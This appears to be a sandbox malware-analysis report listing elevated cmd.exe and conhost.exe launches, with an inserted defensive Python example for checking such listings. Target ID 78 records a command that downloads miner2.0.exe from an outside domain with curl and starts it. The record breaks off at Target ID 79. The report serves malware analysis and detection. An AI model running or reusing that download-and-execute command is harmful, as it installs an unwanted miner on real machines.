                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:27
                                                                                                                                                                Start time:11:42:11
                                                                                                                                                                Start date:27/09/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 28
Start time: 11:42:11
Start date: 27/09/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 29
Start time: 11:42:13
Start date: 27/09/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\cmd.exe" /c
Imagebase: 0x7ff7bb480000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 30
Start time: 11:42:13
Start date: 27/09/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\cmd.exe" /c
Imagebase: 0x7ff7067d0000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 31
Start time: 11:42:13
Start date: 27/09/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 32
Start time: 11:42:13
Start date: 27/09/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 33
Start time: 11:42:14
Start date: 27/09/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\cmd.exe" /c
Imagebase: 0x7ff7067d0000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 34
Start time: 11:42:14
Start date: 27/09/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 35
Start time: 11:42:14
Start date: 27/09/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\cmd.exe" /c
Imagebase: 0x7ff7067d0000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 36
Start time: 11:42:14
Start date: 27/09/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 37
Start time: 11:42:15
Start date: 27/09/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\cmd.exe" /c
Imagebase: 0x7ff7067d0000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 38
Start time: 11:42:16
Start date: 27/09/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 39
Start time: 11:42:16
Start date: 27/09/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\cmd.exe" /c
Imagebase: 0x7ff7067d0000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 40
Start time: 11:42:16
Start date: 27/09/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 41
Start time: 11:42:17
Start date: 27/09/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\cmd.exe" /c
Imagebase: 0x7ff7067d0000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:42
                                                                                                                                                                Start time:11:42:17
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:43
                                                                                                                                                                Start time:11:42:17
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:44
                                                                                                                                                                Start time:11:42:17
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:45
                                                                                                                                                                Start time:11:42:18
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:46
                                                                                                                                                                Start time:11:42:18
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:47
                                                                                                                                                                Start time:11:42:18
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:48
                                                                                                                                                                Start time:11:42:18
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:50
                                                                                                                                                                Start time:11:42:20
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:51
                                                                                                                                                                Start time:11:42:20
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:52
                                                                                                                                                                Start time:11:42:20
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:53
                                                                                                                                                                Start time:11:42:20
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:54
                                                                                                                                                                Start time:11:42:21
                                                                                                                                                                Start date:27/09/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\cmd.exe" /c
Imagebase:0x7ff7067d0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:55
Start time:11:42:21
Start date:27/09/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:56
Start time:11:42:21
Start date:27/09/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\cmd.exe" /c
Imagebase:0x7ff7067d0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:57
Start time:11:42:21
Start date:27/09/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:58
Start time:11:42:22
Start date:27/09/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\cmd.exe" /c
Imagebase:0x7ff7067d0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:59
Start time:11:42:22
Start date:27/09/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:60
Start time:11:42:23
Start date:27/09/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\cmd.exe" /c
Imagebase:0x7ff7067d0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:61
Start time:11:42:23
Start date:27/09/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:62
Start time:11:42:25
Start date:27/09/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\cmd.exe" /c
Imagebase:0x7ff7067d0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:63
Start time:11:42:25
Start date:27/09/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\cmd.exe" /c
Imagebase:0x7ff7067d0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:64
Start time:11:42:25
Start date:27/09/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:65
Start time:11:42:25
Start date:27/09/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:66
Start time:11:42:27
Start date:27/09/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\cmd.exe" /c
Imagebase:0x7ff7067d0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:67
Start time:11:42:27
Start date:27/09/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\cmd.exe" /c
Imagebase:0x7ff7067d0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

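The entries above are what an analyst usually has to work from when the payload after `cmd.exe /c` is not shown: a run of elevated cmd.exe launches, each with its own conhost.exe, within a few seconds. As an added example (not Joe Sandbox code and not part of this report), the following Python parses entries in this listing's `Key:value` layout and runs three checks a practitioner would want: that every copy of a given image name ran from one path with one MD5 (a second path or hash for cmd.exe would mean a different binary, not the system one), how many elevated cmd.exe launches occurred per second, and which entries end in a bare `/c` so the actual command must be recovered from another part of the report. The `SAMPLE` text is a constructed excerpt of the entries above trimmed to the fields the checks use; Target ID 999 is a constructed entry (cmd.exe from a second path with a different MD5) added only so the consistency check has something to fire on, and does not appear in the report.

```python
"""Checks over a Joe Sandbox process listing (added example, not report code)."""
import re
from collections import defaultdict
from datetime import datetime

# Constructed excerpt of the listing above, trimmed to the fields used below.
# Target ID 999 is NOT in the report: a constructed second cmd.exe so the
# image-consistency check has a positive case.
SAMPLE = r"""
Target ID:56
Start time:11:42:21
Start date:27/09/2024
Path:C:\Windows\System32\cmd.exe
Commandline:"C:\Windows\System32\cmd.exe" /c
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true

Target ID:57
Start time:11:42:21
Start date:27/09/2024
Path:C:\Windows\System32\conhost.exe
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true

Target ID:62
Start time:11:42:25
Start date:27/09/2024
Path:C:\Windows\System32\cmd.exe
Commandline:"C:\Windows\System32\cmd.exe" /c
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true

Target ID:63
Start time:11:42:25
Start date:27/09/2024
Path:C:\Windows\System32\cmd.exe
Commandline:"C:\Windows\System32\cmd.exe" /c
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true

Target ID:999
Start time:11:42:25
Start date:27/09/2024
Path:C:\Windows\Temp\cmd.exe
Commandline:"C:\Windows\Temp\cmd.exe" /c
MD5 hash:00000000000000000000000000000000
Has elevated privileges:true
"""


def parse_entries(text):
    """One dict per blank-line-separated block; keys are the report's own labels.
    Splitting on the first ':' keeps values such as 11:42:21 and C:\\... intact."""
    entries = []
    for block in re.split(r"\n\s*\n", text.strip()):
        entry = {}
        for line in block.splitlines():
            key, _, value = line.partition(":")
            entry[key.strip()] = value.strip()
        entries.append(entry)
    return entries


def started_at(entry):
    stamp = entry["Start date"] + " " + entry["Start time"]
    return datetime.strptime(stamp, "%d/%m/%Y %H:%M:%S")


def inconsistent_images(entries):
    """Image names seen with more than one (path, MD5) pair. Every cmd.exe and
    conhost.exe in a clean listing shares one path and one hash."""
    seen = defaultdict(set)
    for e in entries:
        name = e["Path"].rsplit("\\", 1)[-1].lower()
        seen[name].add((e["Path"].lower(), e["MD5 hash"].upper()))
    return {name: pairs for name, pairs in seen.items() if len(pairs) > 1}


def launches_per_second(entries, image="cmd.exe", elevated_only=True):
    """Count launches of `image` per wall-clock second; bursts of elevated
    cmd.exe /c are the pattern worth pulling the parent process for."""
    counts = defaultdict(int)
    for e in entries:
        if not e["Path"].lower().endswith("\\" + image):
            continue
        if elevated_only and e.get("Has elevated privileges") != "true":
            continue
        counts[started_at(e).isoformat()] += 1
    return dict(counts)


def bare_switch(entries, switch="/c"):
    """Target IDs whose command line ends in the switch with nothing after it:
    the listing shows no payload, so it has to be recovered elsewhere."""
    return [e["Target ID"] for e in entries
            if e.get("Commandline", "").rstrip().endswith(" " + switch)]


if __name__ == "__main__":
    procs = parse_entries(SAMPLE)
    print("inconsistent images:", inconsistent_images(procs))
    print("elevated cmd.exe per second:", launches_per_second(procs))
    print("bare /c entries:", bare_switch(procs))
```

Run against the full listing rather than the excerpt, the expected result for the entries shown is an empty `inconsistent_images` result (one path and one MD5 for cmd.exe, one for conhost.exe) and a per-second count that mirrors the pairs above; the constructed Target ID 999 is what makes the consistency check return something here.
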
Target ID:68
Start time:11:42:27
Start date:27/09/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:69
                                                                                                                                                                Start time:11:42:27
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:70
                                                                                                                                                                Start time:11:42:28
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:71
                                                                                                                                                                Start time:11:42:28
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:72
                                                                                                                                                                Start time:11:42:28
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:73
                                                                                                                                                                Start time:11:42:28
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:74
                                                                                                                                                                Start time:11:42:29
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:75
                                                                                                                                                                Start time:11:42:29
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:76
                                                                                                                                                                Start time:11:42:29
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:77
                                                                                                                                                                Start time:11:42:29
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:78
                                                                                                                                                                Start time:11:42:31
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c cd /d %temp% && del miner2.0.exe 2>nul && curl -o miner2.0.exe https://eijfrhegrtbrfcd.online/download/miner2.0.exe && start miner2.0.exe
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:79
                                                                                                                                                                Start time:11:42:31
                                                                                                                                                                Start date:27/09/2024
